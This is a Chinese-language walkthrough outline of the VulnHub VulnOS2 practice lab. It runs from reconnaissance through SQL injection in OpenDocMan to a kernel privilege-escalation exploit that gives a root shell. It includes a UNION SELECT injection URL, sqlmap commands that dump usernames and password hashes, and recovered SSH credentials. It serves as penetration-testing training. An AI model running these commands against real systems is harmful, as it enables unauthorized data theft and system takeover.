滲透測試實戰-Vuulnhub-Vulnos2

VulnOs2 - 幕布

VulnOs2

 

• 基本介紹和信息
  • 目標
    • 滲透服務器上這個公司的網站，獲取root權限並找到Flag
    • 網站狀況
      • JABC a bioware company
    • 端口探測
    • 目錄探測
      • robots.txt
        • 沒有獲得什麼重要的信息
      • 使用dirb掃描也沒有什麼重大的收穫
      • 經過在網上查找，有人說在http://192.168.1.20/jabc/?q=node/7的 源碼中有能夠利用的信息
        • 首先界面上是沒有什麼重要的信息
      • 在源碼中
        • 找到了一個登陸的地址/jabcd0cs
• 發現登陸後臺
  • 也能夠在那個界面全選
  • http://192.168.1.20/jabcd0cs
    • 是一個OpenDoc Man 的界面
  • 查找相關漏洞 在https://www.exploit-db.com/上能夠進行搜索，根據opendocman的版本
    • 上面有詳細的信息
  • 基本的介紹
    • SQL Injection[CWE-89] Improper Access Control[CWE-284]
  • details
  • 使用kali自帶的漏洞搜索工具searchploit opendocman 搜索
    • 找到相應版本
    • 打開後面對應的文件
      • 跟在網站上查到的是同樣的
  • sql
    • The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
      • 獲得版本信息
      • 有多是用戶名什麼的
    • 使用sqlmap
      • sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
        • 有效的數據庫
      • 查看jabcd0cs數據庫有哪些表 sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables
        • 發現十五個表
      • 查看user表
        • sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
      • 查看username 和password字段
        • sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
      • 對密碼進行解密
    • 還能夠
      • 獲取密碼
• 登陸SSH
  • 使用webmin webmin1980登陸
• 探索一番後沒有找到有用的，查看一下內核
  • 內核版本
  • 查找對應 漏洞
    • 一樣是searchsploit 命令
  • 在Kali上創建臨時HTTP服務，在目標機上下載
  • 進行編譯，修改權限，並運行,最後獲得了具備root權限的shell
  • 進入根目錄查看flag

以上內容整理於 幕布